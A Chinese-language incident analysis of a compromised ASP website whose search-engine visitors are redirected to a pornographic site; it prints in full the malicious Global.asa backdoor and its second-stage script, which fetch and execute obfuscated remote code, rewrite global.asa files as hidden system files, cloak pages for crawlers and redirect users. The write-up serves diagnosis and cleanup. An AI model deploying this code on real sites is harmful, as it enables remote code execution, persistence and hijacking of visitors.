最近,有个别用户反映网站直接从浏览器打开正常,但从百度或者google等搜索引擎搜索结果点击打开后会跳转到色情网站。
分析:
1,该问题都发生在 asp网站
2,网站访问量较大
3,网站首页等程序文件并未有篡改迹象
4,发现根目录下有Global.asa 文件(罪魁祸首)
打开Global.asa 查看代码如下:
<script language="vbscript" runat="server">
'by*diao
'by*aming
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
url="h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
if instr(GetHtml,"by*aming")>0 then
execute GetHtml
end if
end sub
'sub Session_OnEnd
'end sub
</script>
因为Global.asa文件为网站启动文件,当一个网站被第一次访问时,会执行Application_Start代码段的内容,当一个用户第一次访问时会执行Session_Start代码段的内容,所以此段代码的作用就是当访问,从 http://www.tayequ.com/txt/globals.txt 处下载内容,并执行,让我们来看看 http://www.tayequ.com/txt/globals.txt 的内容是什么吧:
'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by*aming
'Server.ScriptTimeout=600
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function createasax(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asax"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/global.asax"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
Function check(user_agent)
allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function
Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google.cn/search?|sogou.com/web?query=|soso.com/q?w="
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub
If CheckRefresh=true Then
If check(user_agent)=false Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
response.redirect("http://www.hencao.com/hh.html?html"&cnnbd&"")
response.end
end If
end if
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
if check(user_agent)=true then
body=GetHtml("http://98.126.137.155:28/?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")
response.write body
'response.end
else
asa=GetHtml("h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t")
'if instr(asa,"by*diao")>0 then
' createasa(asa)
'end if
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
geturl =LCase(geturl)
Call sleep()
'end if
end if
'</body></html>
块代码的作用就是判断访问页面是否来自于搜索引擎,是的话,就将HTML:"http://www.hencao.com/hh.html?html 输入给浏览器。也就是打开网站后跳转的色情网站地址。
5,解决方法:
解决方法很简单 那就是删除 Global.asa 文件,最主要的还是要检查一下程序的安全问题,多出这个文件不是偶然,99% 是程序有漏洞,被利用后上传了该文件。
感谢:jude_liu